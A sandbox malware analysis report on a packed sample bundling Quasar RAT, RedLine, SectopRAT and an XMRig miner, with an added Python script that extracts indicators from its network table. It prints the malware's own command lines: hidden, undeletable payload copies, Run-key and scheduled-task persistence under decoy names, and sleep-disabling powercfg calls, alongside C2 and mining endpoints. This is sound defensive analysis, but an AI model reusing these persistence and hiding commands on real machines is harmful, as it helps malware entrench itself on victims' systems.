Malware Analysis Report

2024-09-11 09:52

Sample ID 240726-x1fw3sselb
Target Aurora.exe
SHA256 72e1fc6da0a5cfca80413b8b24a880b0688908264971cfedaf079ee52ce4d850
Tags
themida quasar redline sectoprat xmrig cheat themdas discovery evasion execution infostealer miner persistence rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Threat Level: Known bad

The file Aurora.exe was found to be: Known bad.

Malicious Activity Summary

xmrig

SectopRAT payload

RedLine

Quasar RAT

Quasar payload

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine payload

SectopRAT

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Sets file to hidden

Checks BIOS information in registry

Checks computer location settings

Loads dropped DLL

Modifies file permissions

Themida packer

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Adds Run key to start application

Power Settings

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Views/modifies file attributes

Runs ping.exe

Suspicious use of SendNotifyMessage

MITRE ATT&CK Matrix

N/A

Analysis: static1

Detonation Overview

Reported

2024-07-26 19:19

Signatures

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-26 19:18

Reported

2024-07-26 19:21

Platform

win7-20240708-en

Max time kernel

150s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge = "C:\\Users\\Admin\\AppData\\Local\\Msedge.exe" C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\OneDriveUpdate\\OneDrive Updater.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3052 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe
PID 3052 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe
PID 2916 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe C:\Windows\system32\cmd.exe
PID 3052 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
PID 2584 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 3052 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe
PID 2604 wrote to memory of 772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2604 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2604 wrote to memory of 652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 652 wrote to memory of 584 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Msedge.exe
PID 2780 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\cmd.exe
PID 2588 wrote to memory of 2176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2780 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 340 wrote to memory of 1644 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Aurora.exe

"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"

C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe

"C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe"

C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe

"C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd /Q /C " ping localhost -n 1 && copy "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\Admin\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\Admin\AppData\Local\Msedge.exe" && icacls "C:\Users\Admin\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\Admin\AppData\Local\Msedge.exe" && exit" && && exit "

C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe"

C:\Windows\system32\cmd.exe

cmd /Q /C " ping localhost -n 1 && copy "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\Admin\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\Admin\AppData\Local\Msedge.exe" && icacls "C:\Users\Admin\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\Admin\AppData\Local\Msedge.exe"

C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe

"C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 1

C:\Windows\system32\attrib.exe

attrib +r +h +a "C:\Users\Admin\AppData\Local\Msedge.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Users\Admin\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA)

C:\Windows\system32\cmd.exe

cmd /C "start "C:\Users\Admin\AppData\Local\Msedge.exe

C:\Users\Admin\AppData\Local\Msedge.exe

C:\Users\Admin\AppData\Local\Msedge.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\Admin\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\Admin\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \OneDriveUpdate /tr "C:\Users\Admin\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn ConsoleWindowsHost /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe'

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "ConsoleWindowsHost"

C:\Windows\system32\taskeng.exe

taskeng.exe {D836DB8D-E9AF-4557-B32A-0E25C2D2934D} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe

C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn ConsoleWindowsHost /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe'

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe

Network

Country  Destination            Domain                     Proto
GB       154.81.220.233:28105   -                          tcp
US       8.8.8.8:53             auroraforge.art            udp
US       192.64.119.108:55326   auroraforge.art            tcp
GB       154.81.220.233:28105   -                          tcp
GB       154.81.220.233:28105   -                          tcp
GB       154.81.220.233:28105   -                          tcp
GB       154.81.220.233:28105   -                          tcp
US       8.8.8.8:53             thesirenmika.com           udp
CN       123.123.123.123:55713  thesirenmika.com           tcp
US       8.8.8.8:53             xmr-us-east1.nanopool.org  udp
CA       51.79.71.77:14444      xmr-us-east1.nanopool.org  tcp
GB       154.81.220.233:28105   -                          tcp
GB       154.81.220.233:28105   -                          tcp
US       192.64.119.108:55326   auroraforge.art            tcp
GB       154.81.220.233:28105   -                          tcp
CN       123.123.123.123:55713  thesirenmika.com           tcp
GB       154.81.220.233:28105   -                          tcp
GB       154.81.220.233:28105   -                          tcp
GB       154.81.220.233:28105   -                          tcp
GB       154.81.220.233:28105   -                          tcp
US       192.64.119.108:55326   auroraforge.art            tcp
GB       154.81.220.233:28105   -                          tcp
GB       154.81.220.233:28105   -                          tcp
GB       154.81.220.233:28105   -                          tcp
GB       154.81.220.233:28105   -                          tcp
CN       123.123.123.123:55713  thesirenmika.com           tcp
GB       154.81.220.233:28105   -                          tcp
GB       154.81.220.233:28105   -                          tcp
GB       154.81.220.233:28105   -                          tcp
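The table above lists every connection individually, so the same endpoint 154.81.220.233:28105 appears 19 times and the resolver traffic to 8.8.8.8 sits between the connections that matter. Below is an added example, not part of the sandbox report, that parses this row layout into a deduplicated IOC list: the names the sample resolved, the unique ip:port endpoints with hit counts, and a heuristic label that marks the nanopool host as the Monero pool behind the report's xmrig tag. The embedded rows are a subset copied from the table (Domain omitted where the report lists none); the label() heuristic and the tag names are this example's own assumptions.

```python
"""Parse the flattened sandbox network table into a deduplicated IOC list."""
import re
from collections import Counter

# Constructed sample input: rows copied from the behavioral1 network table
# above. The Domain column is absent on the direct-to-IP rows.
NETWORK_TABLE = """\
Country Destination Domain Proto
GB 154.81.220.233:28105 tcp
US 8.8.8.8:53 auroraforge.art udp
US 192.64.119.108:55326 auroraforge.art tcp
GB 154.81.220.233:28105 tcp
US 8.8.8.8:53 thesirenmika.com udp
CN 123.123.123.123:55713 thesirenmika.com tcp
US 8.8.8.8:53 xmr-us-east1.nanopool.org udp
CA 51.79.71.77:14444 xmr-us-east1.nanopool.org tcp
GB 154.81.220.233:28105 tcp
"""

# Domain is optional; the regex backtracks so that "tcp"/"udp" is never
# mistaken for a domain on rows that have none.
ROW_RE = re.compile(
    r"^(?P<cc>[A-Z]{2})\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d{1,5})"
    r"(?:\s+(?P<domain>[A-Za-z0-9.-]+))?\s+(?P<proto>tcp|udp)$"
)


def parse_rows(text):
    """One dict per data row. A row that does not fit the layout raises
    instead of being skipped, so a changed export format is noticed."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Country"):
            continue
        m = ROW_RE.match(line)
        if m is None:
            raise ValueError(f"unparseable row: {line!r}")
        row = m.groupdict()
        row["port"] = int(row["port"])
        rows.append(row)
    return rows


def is_dns(row):
    """udp/53 rows are lookups through the sandbox resolver, not C2 sessions."""
    return row["proto"] == "udp" and row["port"] == 53


def label(domain):
    """Heuristic endpoint tag (assumption): a nanopool hostname is the Monero
    pool the xmrig tag refers to; anything else is treated as a C2 candidate."""
    if domain and "nanopool" in domain:
        return "mining-pool"
    return "c2-candidate"


def extract_iocs(text):
    """Split the table into resolved names and deduplicated connections
    (ip, port, domain-or-'-') with a hit count per endpoint."""
    rows = parse_rows(text)
    queried = sorted({r["domain"] for r in rows if is_dns(r) and r["domain"]})
    conns = Counter(
        (r["ip"], r["port"], r["domain"] or "-") for r in rows if not is_dns(r)
    )
    return {"queried_domains": queried, "connections": conns}


if __name__ == "__main__":
    iocs = extract_iocs(NETWORK_TABLE)
    print("resolved names:", ", ".join(iocs["queried_domains"]))
    for (ip, port, dom), n in iocs["connections"].most_common():
        print(f"{ip}:{port:<5} {dom:<26} {label(dom):<13} x{n}")
```

Feeding the full table instead of the embedded subset gives the same four unique endpoints; only the counts change. Keep the DNS rows separate when blocking: the names are worth sinkholing, but 8.8.8.8:53 itself is not an indicator.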

Files

memory/3052-0-0x0000000000E00000-0x00000000028CA000-memory.dmp

memory/3052-2-0x00000000767B0000-0x00000000767F7000-memory.dmp

memory/3052-1-0x00000000767BE000-0x00000000767BF000-memory.dmp

memory/3052-3-0x00000000767B0000-0x00000000767F7000-memory.dmp

memory/3052-7-0x00000000767B0000-0x00000000767F7000-memory.dmp

C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe

MD5 65f0a85c4b056d6bcee60c49e2372e35
SHA1 6af820a2030950617bf150777af4a43a06a17184
SHA256 d64768ea74224057220bff451504b6128ddfb6161617b668626c490c84b3ae8e
SHA512 7a50bd0b3908f830494b2bff13a051ba0cdc7900934dbf8a62616f6d29b914f05f8029bbcc429a095254ebb6ab2a2d92c05dd6aebf57e34cde20f152243df383

C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe

MD5 c9a9d471428a5f92068c0823e6454254
SHA1 8b8ee8612b9b8bfbb165b3a8ca0d4a377b589dd2
SHA256 b0ffaa8c7d8fe1e804afc87e6f7659483c69d421911ddbfc410270011b91bfb5
SHA512 ca34022e99a48639fb3566ec4eb901a2f91121aee6a1f1bc601492dd94387873afc8af499aefed8d644aef8f564ca46a12ea40176da7f8d7b4e60f4b505ac8af

memory/2808-22-0x00000000767B0000-0x00000000767F7000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe

MD5 3b4f58cd4bca7274be25e885be00798b
SHA1 eb57c281d8324a1079db97c9da43483a65debbed
SHA256 a6832546e1d261c33deea58e1cbb8a391af91628b130454d55aef3e292862d80
SHA512 dc909730b2feacba3c14c98a2b443d5c12dfd74ce74db53cf7e564e01707ac365811e4d3b95c0cefe2b87ebd1b074fb4a395360911c3d11de4fa8957e9bad121

\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe

MD5 b9fc8581b52abfc6b563da731438e27d
SHA1 43111fe9b307c850a379fe2d64d279e994680de3
SHA256 e03debe75b2f4f4c937c50773064b9a692b262bfce4472e67900edf3f7726058
SHA512 c62540e73870caf9a93fbc2396ac99867f8f6e87661240d7642022130008bdb769954f1e8a58d13698172e62cc5b7d44a73b2f1d999db47822eb294c629436a5

memory/2808-33-0x0000000000BC0000-0x0000000000BDE000-memory.dmp

memory/2780-34-0x0000000000830000-0x0000000000B5E000-memory.dmp

memory/3052-40-0x00000000767B0000-0x00000000767F7000-memory.dmp

memory/3052-43-0x0000000000E00000-0x00000000028CA000-memory.dmp

memory/2004-47-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2004-49-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2004-55-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2004-56-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2004-58-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2004-57-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2004-53-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2004-51-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2580-59-0x000000013F5A0000-0x000000013FB3A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S706453V6N591KYNT1TQ.temp

MD5 02a8a7bcae39f969197d0e8ef57a8267
SHA1 5677cde09d659bdcca4644e1991b17b95ff72d06
SHA256 03a4cf272daafef8d70d2414f09ad6652f4fbe1c1f19b68e2a6c4b78a855ac47
SHA512 8f6c40f9810c9b5def8f74789a219cbe9a9c7f306a5be40ff38d6dd052239806073b9e7a55f94e424e876cd99b55f58c0b7574717a160186f06200de16c50961

memory/1732-64-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

memory/1732-65-0x0000000002850000-0x0000000002858000-memory.dmp

memory/2580-68-0x000000013F5A0000-0x000000013FB3A000-memory.dmp

memory/2808-72-0x00000000767B0000-0x00000000767F7000-memory.dmp

memory/316-73-0x000000013FEF0000-0x000000014048A000-memory.dmp

memory/3012-79-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

memory/3012-80-0x0000000001E40000-0x0000000001E48000-memory.dmp

memory/1348-85-0x00000000000B0000-0x00000000000D0000-memory.dmp

memory/316-86-0x000000013FEF0000-0x000000014048A000-memory.dmp

memory/276-87-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1348-88-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-90-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/276-92-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1348-93-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-95-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-97-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-99-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-101-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-103-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-105-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-107-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1348-109-0x0000000140000000-0x00000001407EF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-26 19:18

Reported

2024-07-26 19:22

Platform

win10v2004-20240709-en

Max time kernel

149s

Max time network

160s

Command Line

C:\Windows\Explorer.EXE

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge = "C:\\Users\\Admin\\AppData\\Local\\Msedge.exe" C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDriveUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\OneDriveUpdate\\OneDrive Updater.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Command and Scripting Interpreter: PowerShell

execution
